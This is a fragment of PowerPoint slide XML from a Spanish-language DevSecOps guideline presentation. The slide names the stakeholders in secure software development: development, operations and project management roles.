                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>DevSecOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> Guideline</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="2000">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Imagen 4" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF9CB7A6-D0AE-2678-9062-492B4ECEEE04}"/>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62033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8B04A-B814-5556-EFE0-B0959AA203D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730D1A5-6E37-A0B6-346C-767A1628A88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41A8334-578A-C35D-7E5E-A59A95799B30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="251936"/>
            <a:ext cx="8350369" cy="1569660"/>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Los diferentes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>stakeholders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>, interesados / participantes en un desarrollo de software seguro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25715B5F-3885-EB2B-C127-5C42AEDBA0D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CuadroTexto 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE800981-6113-FF3B-0CBB-3835324C7F7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480134" y="5182777"/>
            <a:ext cx="3049926" cy="769441"/>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100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referencia:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Auditoría de código - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="467886"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Diferentes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="467886"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>stakeholders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>, interesados/participantes en un desarrollo de software seguro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Elipse 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BE4CFD9-3979-9A63-2789-68C7663F0232}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4260266" y="2532067"/>
            <a:ext cx="3060000" cy="3060000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="11EFB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7" name="Elipse 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD671E2-498F-D27A-B772-D3CA8DE1973A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5240905" y="1926926"/>
            <a:ext cx="1080000" cy="1105318"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C4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8" name="Elipse 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F608A3D-E053-6C95-5253-85A873D8CF02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3759973" y="3308489"/>
            <a:ext cx="1080000" cy="1080000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C4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9" name="Elipse 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{720A3F6A-B0E8-0BEC-0133-51B9F6435A7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657808" y="4969069"/>
            <a:ext cx="1080000" cy="1080000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C4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10" name="Elipse 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{872C2D11-4938-6F75-75EC-B8F1FDEF4FCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6439327" y="4669545"/>
            <a:ext cx="1080000" cy="1080000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C4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11" name="Elipse 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB783D09-79B3-FA77-50B5-D0C6DE262344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858465" y="3032244"/>
            <a:ext cx="1080000" cy="1080000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C4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12" name="CuadroTexto 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824C4B56-DEA4-45B4-7C12-61096E17FF71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="868936" y="2157818"/>
            <a:ext cx="3642724" cy="1169551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Desarrollo de software (Dev) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Responsable de desarrollo, arquitecto, analistas (tanto funcionales como orgánicos), desarrolladores, administradores de bases de datos, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="CuadroTexto 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9178E9BA-3588-A885-258F-3C641D3CEFF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7895829" y="5238123"/>
            <a:ext cx="3777828" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dirección del proyecto: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dirección, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>product</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, responsable de gestión de proyecto, jefe de proyecto, cliente, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="CuadroTexto 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E81A3F71-B8F1-1DA0-B80F-091C10F50D5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="493897" y="4019724"/>
            <a:ext cx="3550790" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Operaciones y mantenimiento (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Responsable de sistemas y redes, administradores de sistema, operadores de infraestructura, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Google Shape;6002;p52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1374D856-4ED3-643B-67D5-AE4C8A53C724}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4019384" y="3573674"/>
            <a:ext cx="528984" cy="544402"/>
            <a:chOff x="7594288" y="2415259"/>
            <a:chExt cx="279513" cy="355735"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Google Shape;6003;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA0D31CA-A20C-47ED-882B-6E15EF9FB3B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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17" name="Google Shape;6004;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD007B8D-1582-8430-666B-3901D29EE9E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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19" name="Google Shape;6005;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3F2D55D-889A-BBD4-E633-A0528F014DB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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1" name="Google Shape;6006;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB34B721-F762-97A5-D848-5E6635B1838B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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2" name="Google Shape;6007;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DCC673E-3AE8-55E6-1BFC-661026CBB3D3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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3" name="Google Shape;6008;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{475300D9-D15C-BA3C-D406-340EC2060504}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Google Shape;6288;p52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D403962-2D41-0458-18C0-7FC2AC32093D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4911858" y="5190568"/>
            <a:ext cx="578276" cy="630000"/>
            <a:chOff x="7613518" y="1501354"/>
            <a:chExt cx="264433" cy="353074"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Google Shape;6289;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D351F753-341B-F830-6C32-976FB8499AFC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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6" name="Google Shape;6290;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{573B2A3D-B80A-D5A8-87D3-7AE88EDF4A66}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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7" name="Google Shape;6291;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF96C3EB-84BD-5757-CE62-EBB261F2B461}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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8" name="Google Shape;6292;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85AA429C-A319-FBBC-FEDB-1DF2521E4228}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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9" name="Google Shape;6293;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60B44B7C-0313-F26D-50BF-65FBADE377C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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30" name="Google Shape;6294;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{454C183E-7DEA-AB06-05C3-91FCF5DC9485}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Google Shape;5726;p52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38C30AC4-AFC6-12A1-AF45-3C2B4C052E0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6746320" y="4930399"/>
            <a:ext cx="462095" cy="578670"/>
            <a:chOff x="6702211" y="3782599"/>
            <a:chExt cx="270104" cy="361754"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Google Shape;5727;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CA17267-2C6D-1D5E-D63F-BCC16B01144C}"/>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33" name="Google Shape;5728;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{280D6E9A-2549-51C5-756A-56C6C54D3A21}"/>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34" name="Google Shape;5729;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{829764A7-4E6F-B904-0315-88400EFCDB4C}"/>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35" name="Google Shape;5730;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B6E9FED-F3F6-0957-A50A-DBD4F5DAD8FE}"/>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0" name="Google Shape;5731;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F9FE2F1-AD63-2ADE-57B2-33BC42DF4D7D}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41" name="Google Shape;6277;p52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62139067-550E-0EB5-F7AB-1F967321B287}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5525244" y="2166254"/>
            <a:ext cx="540022" cy="633701"/>
            <a:chOff x="8047661" y="1501037"/>
            <a:chExt cx="278404" cy="355260"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Google Shape;6278;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11ED0F22-CB1E-47C0-8DA3-7732E72A0A85}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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3" name="Google Shape;6279;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B01F072-FDA5-5787-A205-2461CD1AD045}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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4" name="Google Shape;6280;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51857F78-7D9C-218D-D338-99920DBA3254}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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5" name="Google Shape;6281;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B368A8-E9E8-B783-CAB3-9374443C22B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Google Shape;5806;p52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A936D3D1-DFF1-D0C2-24E2-2954EECCCCD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7167148" y="3192463"/>
            <a:ext cx="535419" cy="575427"/>
            <a:chOff x="7575787" y="3329955"/>
            <a:chExt cx="295384" cy="376834"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Google Shape;5807;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D59BEB95-D3D6-0453-AEE3-99F1A47891B3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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8" name="Google Shape;5808;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F84A4435-EB20-30A1-B465-AD9DB57A0EC3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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9" name="Google Shape;5809;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D73E2DD5-A2D7-EBCF-5930-F3CAAEAE1624}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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50" name="Google Shape;5810;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1163BEF-1B7C-FA25-B455-57760D4819BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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51" name="Google Shape;5811;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B434BD1C-FF17-DCBE-60FD-E5A28FF40FD9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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52" name="Google Shape;5812;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BF8E656-6E41-0383-B1E5-75712DF5CB17}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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sp>
        <p:nvSpPr>
